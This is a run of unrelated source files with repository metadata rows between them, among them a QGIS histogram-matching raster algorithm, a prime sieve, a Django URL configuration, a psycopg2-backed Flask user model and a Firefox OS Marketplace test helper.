return HistogramMatching()
def name(self):
return 'histogramMatching'
def displayName(self):
return self.tr('Histogram Matching')
def group(self):
return self.tr('Satellite')
def groupId(self):
return 'satellite'
def shortHelpString(self):
return self.tr("Algorithme permantant une égalisation colorimétrique par rapport à une image de référence basé sur un 'Histogram Matching'")
def initAlgorithm(self, config=None):
self.addParameter(
QgsProcessingParameterRasterLayer(
self.INPUT,
self.tr('Couche en entrée')
)
)
self.addParameter(
QgsProcessingParameterRasterLayer(
self.REFERENCE,
self.tr('Couche de référence')
)
)
self.addParameter(
QgsProcessingParameterFeatureSource(
self.MASK,
self.tr('Zone de travail')
)
)
self.addParameter(
QgsProcessingParameterNumber(
self.DESATURATION,
self.tr('Poucentage de désaturation'),
defaultValue = 1,
minValue = 0,
maxValue = 100
)
)
self.addParameter(
QgsProcessingParameterNumber(
self.SATURATION,
self.tr('Poucentage de saturation'),
type=QgsProcessingParameterNumber.Double,
defaultValue = 0,
minValue = 0,
maxValue = 100
)
)
self.addParameter(
QgsProcessingParameterFeatureSource(
self.DECOUPE,
self.tr('Zone de découpe finale'),
optional=True
)
)
self.addParameter(
QgsProcessingParameterFileDestination(
self.OUTPUT,
self.tr('VRT final'),
'VRT files (*.vrt)'
)
)
self.addOutput(
QgsProcessingOutputBoolean(
'SUCCESS',
self.tr('Success')
)
)
def generateClippedInput(self, parameters, context, feedback):
feedback.pushInfo("......Application du mask vecteur sur l'image d'entrée")
clip_result = processing.run(
'gdal:cliprasterbymasklayer',
{
'INPUT': parameters['INPUT'],
'MASK' : parameters['MASK'],
'NODATA' : 0,
'ALPHA_BAND' : True,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(clip_result['OUTPUT'])
def generateClippedReference(self, parameters, context, feedback):
feedback.pushInfo("......Application du mask vecteur sur l'image de référence")
clip_result = processing.run(
'gdal:cliprasterbymasklayer',
{
'INPUT': parameters['REFERENCE'],
'MASK' : parameters['MASK'],
'ALPHA_BAND' : True,
'NODATA' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(clip_result['OUTPUT'])
def generateFinalClip(self, parameters, context, feedback):
feedback.pushInfo("......Application du mask final sur l'image d'entrée")
clip_result = processing.run(
'gdal:cliprasterbymasklayer',
{
'INPUT': parameters['INPUT'],
'MASK' : parameters['DECOUPE'],
'ALPHA_BAND' : True,
'NODATA' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(clip_result['OUTPUT'])
def generateTravailMask(self, parameters, context, feedback):
feedback.pushInfo("......Création du mask de travail")
mask_result = processing.run(
'gdal:rasterize',
{
'INPUT': parameters['MASK'],
'BURN' : 255,
'NODATA': 0,
'EXTENT': parameters['MASK'],
'UNITS' : 1,
'WIDTH' : 0.5,
'HEIGHT' : 0.5,
'DATA_TYPE' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(mask_result['OUTPUT'])
def generateFinalMask(self, parameters, context, feedback):
feedback.pushInfo("......Création du mask final")
mask_result = processing.run(
'gdal:rasterize',
{
'INPUT': parameters['DECOUPE'],
'BURN' : 255,
'NODATA': 0,
'EXTENT': parameters['DECOUPE'],
'UNITS' : 1,
'WIDTH' : 0.5,
'HEIGHT' : 0.5,
'DATA_TYPE' : 0,
'OUTPUT': 'TEMPORARY_OUTPUT'
},
is_child_algorithm=True,
context=context,
feedback=feedback)
return QgsRasterLayer(mask_result['OUTPUT'])
def getDesaturationTuple(self,band,ref_provider,match_provider,ref_cumulhist, match_cumulhist, pourcent_desaturation,pourcent_saturation) :
max_ref = len(ref_cumulhist)
max_match = 0
for i in match_cumulhist :
if i < match_cumulhist[-1]-(match_cumulhist[-1]*pourcent_saturation/100) :
max_match+=1
else :
break
min_ref = int(max_ref-(max_ref*pourcent_desaturation/100))
min_match = 0
for i in match_cumulhist :
if (i/match_cumulhist[-1]) < (ref_cumulhist[min_ref]/ref_cumulhist[-1]) :
min_match+=1
else :
break
pas_match = (max_match - min_match)/pourcent_desaturation
pas_ref = (max_ref - min_ref)/pourcent_desaturation
return (min_ref, min_match, pas_match, pas_ref)
def getRefValue(self,indice, match_cumulhist,ref_cumulhist, desaturation) :
(min_ref, min_match, pas_match, pas_ref) = desaturation
value = 0
for i in ref_cumulhist :
if (i/ref_cumulhist[-1]) < (match_cumulhist[indice]/match_cumulhist[-1]) and (value < min_ref) :
value+=1
else :
break
if value == min_ref :
nbPas = (indice-min_match)/pas_match
value = int(min_ref + nbPas*pas_ref)
return value
    def generateVRT(self,liste_vrt,parameters,context,feedback) :
        """Build a virtual raster (VRT) over the generated tiles.

        liste_vrt: list of tile file paths. The VRT is written to the OUTPUT
        file destination parameter and returned as a raster layer.
        """
        vrt_result = processing.run(
            'gdal:buildvirtualraster',
            {
                'INPUT': liste_vrt,
                'RESOLUTION': 1,     # resolution strategy option of gdal:buildvirtualraster
                'SEPARATE': False,   # merge bands, one tile per location
                'OUTPUT': parameters['OUTPUT']
            },
            is_child_algorithm=True,
            context=context,
            feedback=feedback)
        return QgsRasterLayer(vrt_result['OUTPUT'])
    def generateOverview(self,parameters,context,feedback) :
        """Add pyramid overviews (levels 2..128) to the VRT written at OUTPUT."""
        processing.run(
            'gdal:overviews',
            {
                'INPUT': parameters['OUTPUT'],
                'LEVELS': '2 4 8 16 32 64 128',
                'RESAMPLING': 1,     # resampling method option of gdal:overviews
                'FORMAT': 1,         # overview format option of gdal:overviews
                'OUTPUT': 'TEMPORARY_OUTPUT'
            },
            is_child_algorithm=True,
            context=context,
            feedback=feedback)
    def processAlgorithm(self, parameters, context, feedback):
        """Build an 8-bit histogram-matched, tiled copy of INPUT and expose it as a VRT.

        Pipeline: clip INPUT and REFERENCE to MASK, derive one look-up table per
        RGB band by matching cumulative histograms, write 5km x 5km RGBA GeoTIFF
        tiles, then build a VRT over the tiles and add overviews.
        Returns {'SUCCESS': bool}; False on cancellation or empty histogram.
        """
        # --- Read parameters ------------------------------------------------
        source = self.parameterAsRasterLayer(
            parameters,
            self.INPUT,
            context
        )
        reference = self.parameterAsRasterLayer(
            parameters,
            self.REFERENCE,
            context
        )
        pourcent_desaturation = self.parameterAsInt(
            parameters,
            self.DESATURATION,
            context
        )
        pourcent_saturation = self.parameterAsDouble(
            parameters,
            self.SATURATION,
            context
        )
        if source is None:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.INPUT))
        if reference is None:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.REFERENCE))
        # --- Clip both rasters to the working mask --------------------------
        feedback.setProgress(1)
        feedback.pushInfo('Début clip des images')
        clip_source = self.generateClippedInput(parameters,context,feedback)
        feedback.setProgress(5)
        if feedback.isCanceled():
            return {'SUCCESS': False}
        clip_reference = self.generateClippedReference(parameters,context,feedback)
        feedback.pushInfo('Fin clip des images')
        match_provider = clip_source.dataProvider()
        ref_provider = clip_reference.dataProvider()
        feedback.setProgress(10)
        if feedback.isCanceled():
            return {'SUCCESS': False}
        # --- Red band: cumulative histograms + transformation table ---------
        feedback.pushInfo('Calcul Histo bande rouge')
        ref_histo = ref_provider.histogram(1,0)
        match_histo = match_provider.histogram(1,0)
        if len(match_histo.histogramVector) == 0 :
            feedback.reportError("Impossible de calculer l'histogramme",True)
            return {'SUCCESS': False}
        # NOTE: building each cumulative histogram with sum() per index is O(n^2);
        # acceptable for typical histogram sizes.
        ref_cumulhist_red = [sum(ref_histo.histogramVector[:x+1]) for x in range(len(ref_histo.histogramVector))]
        match_cumulhist_red = [sum(match_histo.histogramVector[:x+1]) for x in range(len(match_histo.histogramVector))]
        desaturation_red = self.getDesaturationTuple(1,ref_provider,match_provider,ref_cumulhist_red, match_cumulhist_red, pourcent_desaturation,pourcent_saturation)
        transformation_table_red = [self.getRefValue(x,match_cumulhist_red,ref_cumulhist_red,desaturation_red) for x in range(len(match_cumulhist_red))]
        feedback.setProgress(20)
        if feedback.isCanceled():
            return {'SUCCESS': False}
        # --- Green band -----------------------------------------------------
        feedback.pushInfo('Calcul Histo bande verte')
        ref_histo = ref_provider.histogram(2,0)
        match_histo = match_provider.histogram(2,0)
        ref_cumulhist_green = [sum(ref_histo.histogramVector[:x+1]) for x in range(len(ref_histo.histogramVector))]
        match_cumulhist_green = [sum(match_histo.histogramVector[:x+1]) for x in range(len(match_histo.histogramVector))]
        desaturation_green = self.getDesaturationTuple(1,ref_provider,match_provider,ref_cumulhist_green, match_cumulhist_green, pourcent_desaturation,pourcent_saturation)
        transformation_table_green = [self.getRefValue(x,match_cumulhist_green,ref_cumulhist_green,desaturation_green) for x in range(len(match_cumulhist_green))]
        feedback.setProgress(30)
        if feedback.isCanceled():
            return {'SUCCESS': False}
        # --- Blue band ------------------------------------------------------
        feedback.pushInfo('Calcul Histo bande bleue')
        ref_histo = ref_provider.histogram(3,0)
        match_histo = match_provider.histogram(3,0)
        ref_cumulhist_blue = [sum(ref_histo.histogramVector[:x+1]) for x in range(len(ref_histo.histogramVector))]
        match_cumulhist_blue = [sum(match_histo.histogramVector[:x+1]) for x in range(len(match_histo.histogramVector))]
        desaturation_blue = self.getDesaturationTuple(1,ref_provider,match_provider,ref_cumulhist_blue, match_cumulhist_blue, pourcent_desaturation,pourcent_saturation)
        transformation_table_blue = [self.getRefValue(x,match_cumulhist_blue,ref_cumulhist_blue,desaturation_blue) for x in range(len(match_cumulhist_blue))]
        feedback.setProgress(40)
        # --- Choose/rasterize the output mask -------------------------------
        feedback.pushInfo('Création du Raster 8 bits')
        liste_vrt=[]
        mask_travail = self.parameterAsVectorLayer(
            parameters,
            self.MASK,
            context
        )
        mask_final = self.parameterAsVectorLayer(
            parameters,
            self.DECOUPE,
            context
        )
        masked = True
        if mask_final is None:
            mask_raster = None
            masked = False
        elif mask_final == mask_travail :
            mask_raster = self.generateTravailMask(parameters,context,feedback)
        else :
            mask_raster = self.generateFinalMask(parameters,context,feedback)
        feedback.setProgress(50)
        if feedback.isCanceled():
            return {'SUCCESS': False}
        final_provider = source.dataProvider()
        if masked:
            mask_provider = mask_raster.dataProvider()
            origin_extent = mask_provider.extent()
        else :
            origin_extent = final_provider.extent()
        # --- Snap the extent outwards onto a 5 km grid ----------------------
        # NOTE(review): the str(int(...))[2:] slicing assumes 6-digit projected
        # coordinates (last 4 digits = position within a 10 km square); verify
        # for the target CRS.
        if int(str(int(origin_extent.xMinimum()))[2:]) < 5000 :
            fe_xmin = int(origin_extent.xMinimum()/10000)*10000
        else :
            fe_xmin = (int(origin_extent.xMinimum()/10000)*10000) + 5000
        if int(str(int(origin_extent.yMinimum()))[2:]) < 5000 :
            fe_ymin = int(origin_extent.yMinimum()/10000)*10000
        else :
            fe_ymin = (int(origin_extent.yMinimum()/10000)*10000) + 5000
        if int(str(int(origin_extent.xMaximum()))[2:]) == 0 :
            fe_xmax = origin_extent.xMaximum()
        elif int(str(int(origin_extent.xMaximum()))[2:]) <= 5000 :
            fe_xmax = (int(origin_extent.xMaximum()/10000)*10000) + 5000
        else :
            fe_xmax = (int(origin_extent.xMaximum()/10000)*10000) + 10000
        if int(str(int(origin_extent.yMaximum()))[2:]) == 0 :
            fe_ymax = origin_extent.yMaximum()
        elif int(str(int(origin_extent.yMaximum()))[2:]) <= 5000 :
            fe_ymax = (int(origin_extent.yMaximum()/10000)*10000) + 5000
        else :
            fe_ymax = (int(origin_extent.yMaximum()/10000)*10000) + 10000
        # Tile size in pixels (5 km at the source resolution).
        width_dalle = int(5000 / float(source.rasterUnitsPerPixelX()))
        # NOTE(review): height also uses rasterUnitsPerPixelX — probably meant
        # rasterUnitsPerPixelY; harmless only for square pixels. Confirm.
        height_dalle = int(5000 / float(source.rasterUnitsPerPixelX()))
        feedback.setProgress(60)
        if feedback.isCanceled():
            return {'SUCCESS': False}
        # Tiles are written into a directory named after OUTPUT without extension.
        if not os.path.exists(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0]):
            os.mkdir(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0])
        feedback.pushInfo('Création des dalles 8BITS')
        feedback.pushDebugInfo ('Extent finale : ('+str(fe_xmin)+','+str(fe_ymin)+','+str(fe_xmax)+','+str(fe_ymax)+')')
        # --- Write one RGBA GeoTIFF per 5 km x 5 km tile --------------------
        for i in range(int((fe_xmax-fe_xmin)/5000)) :
            for j in range(int((fe_ymax-fe_ymin)/5000)) :
                feedback.pushInfo('..........PSUD_SAT50_'+str(fe_xmin+i*5000)+'_'+str(fe_ymin+j*5000)+'_2019_5KM')
                extent_dalle = QgsRectangle(fe_xmin+i*5000,fe_ymin+j*5000,(fe_xmin+i*5000)+5000,(fe_ymin+j*5000)+5000)
                band_red = np.zeros((height_dalle,width_dalle))
                block_source_red = final_provider.block(1, extent_dalle, width_dalle, height_dalle)
                band_green = np.zeros((height_dalle,width_dalle))
                block_source_green = final_provider.block(2, extent_dalle, width_dalle, height_dalle)
                band_blue = np.zeros((height_dalle,width_dalle))
                block_source_blue = final_provider.block(3, extent_dalle, width_dalle, height_dalle)
                band_alpha = np.zeros((height_dalle,width_dalle))
                if masked:
                    block_alpha = mask_provider.block(1, extent_dalle, width_dalle, height_dalle)
                # Per-pixel remap through the per-band transformation tables.
                # NOTE(review): when masked is False the `masked and ...` conjunct
                # below is False for every pixel, so the tiles stay fully
                # zero/transparent — this looks unintended; confirm.
                for x in range(height_dalle):
                    for y in range(width_dalle):
                        if (not block_source_red.isNoData(x,y)) and (masked and int(block_alpha.value(x,y)) == 255):
                            # Values beyond the table are clamped to its last entry.
                            if int(block_source_red.value(x,y)) > len(transformation_table_red)-1 :
                                band_red[x,y] = int(transformation_table_red[-1])
                                #feedback.pushDebugInfo ('Valeur hors limites : '+str(block_source_red.value(x,y)))
                            else :
                                band_red[x,y] = int(transformation_table_red[int(block_source_red.value(x,y))])
                            if int(block_source_green.value(x,y)) > len(transformation_table_green)-1 :
                                band_green[x,y]=int(transformation_table_green[-1])
                                #feedback.pushDebugInfo ('Valeur hors limites : '+str(block_source_green.value(x,y)))
                            else :
                                band_green[x,y]=int(transformation_table_green[int(block_source_green.value(x,y))])
                            if int(block_source_blue.value(x,y)) > len(transformation_table_blue)-1 :
                                band_blue[x,y]=int(transformation_table_blue[-1])
                                #feedback.pushDebugInfo ('Valeur hors limites : '+str(block_source_blue.value(x,y)))
                            else :
                                band_blue[x,y]=int(transformation_table_blue[int(block_source_blue.value(x,y))])
                            band_alpha[x,y]=255
                # Write the 4-band byte tile with deflate compression.
                driver = gdal.GetDriverByName('GTiff')
                ds = driver.Create(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0]+'/PSUD_SAT50_'+str(fe_xmin+i*5000)+'_'+str(fe_ymin+j*5000)+'_2019_5KM.tif', xsize=width_dalle, ysize=height_dalle, bands=4, eType=gdal.GDT_Byte, options=['compress=deflate','predictor=2'])
                ds.GetRasterBand(1).WriteArray(band_red)
                ds.GetRasterBand(2).WriteArray(band_green)
                ds.GetRasterBand(3).WriteArray(band_blue)
                ds.GetRasterBand(4).WriteArray(band_alpha)
                # North-up geotransform anchored at the tile's top-left corner.
                geot = [extent_dalle.xMinimum(), source.rasterUnitsPerPixelX(), 0, extent_dalle.yMaximum(), 0, -source.rasterUnitsPerPixelY()]
                ds.SetGeoTransform(geot)
                srs = osr.SpatialReference()
                srs.ImportFromEPSG(int(source.crs().authid().split(':')[1]))
                ds.SetProjection(srs.ExportToWkt())
                ds = None
                liste_vrt.append(self.parameterAsFileOutput(parameters, self.OUTPUT, context).split('.')[0] + '/PSUD_SAT50_'+str(fe_xmin+i*5000)+'_'+str(fe_ymin+j*5000)+'_2019_5KM.tif')
                # Progress covers the 60-100 range across all tiles.
                avance = int((i*((fe_ymax-fe_ymin)/5000)+j)*40/(((fe_xmax-fe_xmin)/5000)*((fe_ymax-fe_ymin)/5000)))
                feedback.setProgress(60+avance)
                if feedback.isCanceled():
                    return {'SUCCESS': False}
        # --- Mosaic the tiles and add overviews -----------------------------
        vrt_raster = self.generateVRT(liste_vrt,parameters,context,feedback)
        self.generateOverview(parameters,context,feedback)
        return {'SUCCESS': True}
| [
"hugo.roussaffa@province-sud.nc"
] | hugo.roussaffa@province-sud.nc |
e91547d2eac2de1f861288acbabd52cd114d8f97 | 6af9456a7d28b8e0688da062232ecfbb0cfa1644 | /sieve-of-eratosthenes.py | 784e2cff375dc6fcf401e851f1bfff07f4bed5ad | [] | no_license | vishalgupta99/algorithms | 322659bc02f28585bba6cb4f0dbf98d3d771fac2 | f3f43615999408b8a8b76eed1d4d02fb660982b2 | refs/heads/master | 2022-03-23T14:35:16.076562 | 2019-12-21T04:36:12 | 2019-12-21T04:36:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | py | def generatePrime(n):
prime = [1 for i in range(n+1)]
prime[0] = prime[1] = 0
for i in range(2,n+1):
if prime[i]==1:
for j in range(2,n//i+1):
prime[i*j]=0
l=[i for i in range(2,n+1) if prime[i]==1]
return l | [
"noreply@github.com"
] | noreply@github.com |
1c6e4bbb0fea1dd4e79f4dcbafb910d5774243f0 | 0c9b9084b7043f0e9d60b2dc3fb9c3f06292d5c6 | /django_project/urls.py | 410a5d628f204fa4778e5ea84c16529a5b7c39c3 | [] | no_license | tulsivanol/Django_Blog_Full_Framework | 5d349241d8feee17129b6148ad64c9b51ad3b647 | 8b1830e09fd3f97d5be11cae5137c00ea3b22af7 | refs/heads/master | 2022-12-15T05:16:07.426922 | 2020-02-12T03:48:20 | 2020-02-12T03:48:20 | 195,090,509 | 0 | 0 | null | 2022-11-22T04:38:41 | 2019-07-03T16:23:52 | Python | UTF-8 | Python | false | false | 2,527 | py | """django_project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.contrib.auth import views as auth_views
from users import views as user_view
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('blog.urls')),
path('login/', auth_views.LoginView.as_view(template_name='users/login.html'), name='login'),
path('logout/', auth_views.LogoutView.as_view(template_name='users/logout.html'), name='logout'),
path('register/', user_view.register, name='register'),
path('profile/', user_view.profile, name='profile'),
path('password-reset/',
auth_views.PasswordResetView.as_view(
template_name='users/password_reset.html'
),
name='password_reset'),
path('password-reset/done/',
auth_views.PasswordResetDoneView.as_view(
template_name='users/password_reset_done.html'
),
name='password_reset_done'),
path('password-reset-confirm/<uidb64>/<token>/',
auth_views.PasswordResetConfirmView.as_view(
template_name='users/password_reset_confirm.html'
),
name='password_reset_confirm'),
path('password-reset-complete/',
auth_views.PasswordResetCompleteView.as_view(
template_name='users/password_reset_complete.html'
),
name='password_reset_complete'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"tulsivanol@gmail.com"
] | tulsivanol@gmail.com |
1b52f997a4a8cab3a5632bba2673f94fcfa4afa6 | 1ae59950632eb42be218f475b11ec8d5421d25c3 | /app/models/user.py | 0197d203851fcbbd6681788ecbe04e9c784eca9c | [] | no_license | peterjuse/proyecto-ati | 7006678b2411ef3d4dca4d94e33f2aec6edb8295 | 9db19fff562c470c3083cd1d3df1ee8759f8a687 | refs/heads/master | 2016-09-06T02:13:43.928970 | 2015-04-08T04:34:54 | 2015-04-08T04:34:54 | 33,454,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,899 | py | import psycopg2
import hashlib
from werkzeug.security import generate_password_hash, check_password_hash
import re
class User:
 """User model backed directly by PostgreSQL via psycopg2 (no ORM).

 Also provides the methods flask-login expects (is_authenticated,
 is_active, is_anonymous, get_id).
 """
 def __init__(self):
  # Empty shell; fields are populated by create() or get().
  self.id = None
  self.username = None
  self.password_hash = None
  self.email = None
  self.name = None
  self.lastname = None
  self.country = None
  self.city = None
  self.member_since = None
  self.last_seen = None
# Crea un usuario
def create(self, username, email, password, name, lastname, city=None, country=None):
if(username and email and password and name and lastname):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
ref_database.execute("select nextval('user_seq');")
self.id = ref_database.fetchone()[0]
self.username = username
self.password_hash = generate_password_hash(password)
self.email = email
self.name = name
self.lastname = lastname
self.city = city
self.country = country
ref_database.execute('select now();')
self.member_since = self.last_seen = ref_database.fetchone()[0]
ref_database.execute('insert into users values (%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);', (self.id, self.email, self.password_hash, self.username, self.name, self.lastname, self.city, self.country, self.member_since, self.last_seen,))
connection.commit()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return True
return False
def get(self,username,id=None):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
if id == None:
ref_database.execute('select * from users where username = %s;',(username,))
result = ref_database.fetchone()
if result:
self.id = result[0]
self.username = result[1]
self.password_hash = result[2]
self.email = result[3]
self.name = result[4]
self.lastname = result[5]
self.country = result[6]
self.city = result[7]
self.member_since = result[8]
self.last_seen = result[9]
else:
return False
else:
ref_database.execute('select * from users where id = %s;',(id,))
result = ref_database.fetchone()
if result:
self.id = result[0]
self.username = result[1]
self.password_hash = result[2]
self.email = result[3]
self.name = result[4]
self.lastname = result[5]
self.country = result[6]
self.city = result[7]
self.member_since = result[8]
self.last_seen = result[9]
else:
return False
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return self
 # Return a user's information.
 # NOTE(review): every accessor below is shadowed by the instance attribute of
 # the same name assigned in __init__, so user.id etc. resolve to the
 # attribute, not the method — these defs are effectively dead code.
 def id(self):
  return self.id
 def username(self):
  return self.username
 def email(self):
  return self.email
 def name(self):
  return self.name
 def lastname(self):
  return self.lastname
 def city(self):
  return self.city
 def country(self):
  return self.country
 def last_seen(self):
  return self.last_seen
 def nro_pasties_privates(self):
  return len(self.pasties(private=1))
 # NOTE(review): pasties() with no argument returns ALL pasties (see pasties
 # below), so this counts private ones too — "publics" is a misnomer.
 def nro_pasties_publics(self):
  return len(self.pasties())
 def avatar(self, size, default = 'identicon'):
  # Gravatar URL built from the MD5 of the username (Gravatar normally hashes
  # the e-mail — presumably intentional here; confirm).
  if self.id:
   hash = hashlib.md5(self.username.encode('utf-8')).hexdigest()
   return 'http://www.gravatar.com/avatar/%s?s=%d&d=%s' % (hash, size, default)
  return None
# Actualiza informacion de un usuario
def set(self, email=None, password=None, name=None, lastname=None, city=None, country=None):
if (email or password or name or lastname or city or country):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
if email:
self.email = email
if password:
self.password_hash = generate_password_hash(password)
if name:
self.name = name
if lastname:
self.lastname = lastname
if city:
self.city = city
if country:
self.country = country
ref_database.execute('update users set email=%s, password=%s name=%s, lastname=%s, country=%s, city=%s where id=%s;', (self.email, self.password_hash, self.name, self.lastname, self.country, self.city, self.id,))
connection.commit()
ref_database.close()
connection.close()
return True
return False
 # Delete a user
 def delete(self):
  """Delete this user's row and reset the instance. Returns True if a delete ran."""
  if self.id:
   connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
   ref_database = connection.cursor()
   ref_database.execute('delete from users where id=%s;', (self.id,))
   connection.commit()
   # Reset the in-memory instance as well.
   # NOTE(review): password_hash is not cleared here although __init__ sets it.
   self.id = None
   self.username = None
   self.email = None
   self.name = None
   self.lastname = None
   self.country = None
   self.city = None
   self.member_since = None
   self.last_seen = None
   # Close the DB connection:
   ref_database.close()
   connection.close()
   return True
  return False
 # Password verification
 def verifyPassword(self, password):
  # Compare the candidate password against the stored werkzeug hash.
  return check_password_hash(self.password_hash, password)
 # Refresh the last-seen timestamp
 def updateLastSeen(self):
  """Set last_seen to the database clock (now()) and persist it. Returns True."""
  connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
  ref_database = connection.cursor()
  # Use the DB server's clock, not the application host's.
  ref_database.execute('select now();')
  self.last_seen = ref_database.fetchone()[0]
  ref_database.execute('update users set last_seen=%s where id=%s;', (self.last_seen,self.id))
  connection.commit()
  # Close the DB connection:
  ref_database.close()
  connection.close()
  return True
 # Return a user's pasties (all of them, or only private ones)
 def pasties(self,private=None):
  """List this user's pasties, newest first.

  private=None returns every pastie; any other value filters on private=True.
  Returns a list of rows, or None when the instance has no id.
  """
  if self.id:
   connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
   ref_database = connection.cursor()
   # Query:
   if private == None:
    ref_database.execute('select * from pasties where owner=%s order by last_modified desc;', (self.id,))
   else:
    # NOTE(review): the literal string 'True' is bound regardless of the value
    # passed in `private`, so e.g. private=0 still selects private pasties.
    ref_database.execute('select * from pasties where owner=%s and private=%s order by last_modified desc;', (self.id,'True',))
   result = ref_database.fetchall()
   # Close the DB connection:
   ref_database.close()
   connection.close()
   return result
  return None
def pasties_per_page(self, page, size):
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Consulta:
offset = page*size
ref_database.execute('select * from pasties where owner=%s order by last_modified desc limit %s offset %s;', (size, offset,))
result = ref_database.fetchall()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
return result
 # Return all users
 def all(self):
  """Return every user row, ordered by name ascending."""
  connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
  ref_database = connection.cursor()
  # Query:
  ref_database.execute('select * from users order by name asc;')
  result = ref_database.fetchall()
  # Close the DB connection:
  ref_database.close()
  connection.close()
  return result
 def per_page(self, page, size):
  """Return one page (LIMIT size OFFSET page*size) of users.

  NOTE(review): orders by name DESC while all() orders ASC — confirm which
  direction is intended.
  """
  connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
  ref_database = connection.cursor()
  # Query:
  offset = page*size
  ref_database.execute('select * from users order by name desc limit %s offset %s;', (size, offset,))
  result = ref_database.fetchall()
  # Close the DB connection:
  ref_database.close()
  connection.close()
  return result
 # Methods required by flask-login for authentication
 def is_authenticated(self): # No account-lockout mechanism exists
  return True
 def is_active(self): # No account-deactivation mechanism exists
  return True
 def is_anonymous(self): # Every user performing direct actions must be registered
  return False
 def get_id(self):
  # flask-login requires a unicode id. NOTE: unicode() is a Python 2 builtin;
  # this whole module is Python 2 code.
  if self.id:
   return unicode(self.id)
  return None
# Validaciones username
@staticmethod
def unique_username(username):
result = None
if username:
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Verificando unicidad del username:
ref_database.execute('select username from users where username = %s;',(username,))
resultado = ref_database.fetchone()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
if resultado==username:
result= False
else:
result=True
return result
@staticmethod
def valid_username(username):
result = None
if username:
result = re.match("@?(\w){3,16}", username)
return result
#Validaciones email
@staticmethod
def unique_email(email):
result = None
if email:
connection = psycopg2.connect(database = 'mypastie_database', user = 'developer', password = 'developer', host = 'localhost')
ref_database = connection.cursor()
# Verificando unicidad del username:
ref_database.execute('select email from users where email = %s;',(email,))
resultado = ref_database.fetchone()
# Cerrando conexion con BD:
ref_database.close()
connection.close()
if resultado==email:
result=False
else:
result=True
return result
@staticmethod
def valid_email(email):
result = None
if email:
result = re.match("^[\w.\+-]+@[\w-]+\.[\w.-]+$", email)
return result
#Validaciones nombre y apellido
@staticmethod
def valid_name(name):
result = None
if name:
result = re.match("^[a-zA-Z_]+$", name)
return result
#Validacion del password:
@staticmethod
def valid_password(password):
result = None
if password:
result = re.match("^[!#\$%&\?\*-\+\(\)\w]){5,}$", password)
return result | [
"pedro.boll22@gmail.com"
] | pedro.boll22@gmail.com |
be89e3bb2bcbb432edbcf5ef7805532ee5823d5d | 30dc32fd39cf71c76fc24d53b68a8393adcac149 | /OWDTestToolkit/apps/Marketplace/__main.py | a24d1a6405e92cfdd242bbf8fe55cd7389288a89 | [] | no_license | carlosmartineztoral/OWD_TEST_TOOLKIT | 448caefdc95bc3e54aad97df0bff7046ffb37be1 | 50768f79488735eba8355824f5aa3686a71d560a | refs/heads/master | 2021-01-15T17:14:03.614981 | 2013-06-11T12:48:18 | 2013-06-11T12:48:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,357 | py | from OWDTestToolkit.global_imports import *
import installApp ,\
searchForApp ,\
selectSearchResultApp
class Marketplace (
    installApp.main,
    searchForApp.main,
    selectSearchResultApp.main):
    """Gaia Marketplace app wrapper; mixes in the install/search/select helpers."""
    def __init__(self, p_parent):
        # Borrow the shared test-toolkit handles from the parent object.
        self.apps = p_parent.apps
        self.data_layer = p_parent.data_layer
        self.parent = p_parent
        self.marionette = p_parent.marionette
        self.UTILS = p_parent.UTILS
    def launch(self):
        #
        # Launch the app.
        #
        self.apps.kill_all()
        # WARNING: Marketplace is in a weird place - you need to use "Marketplace Dev"!!
        # self.app = self.apps.launch(self.__class__.__name__)
        self.UTILS.logResult("info",
                             "About to launch the marketplace app from the dev server. " + \
                             "If it's \"not found\" then either try again later, or contact #marketplace mozilla irc channel.")
        self.app = self.apps.launch("Marketplace Dev")
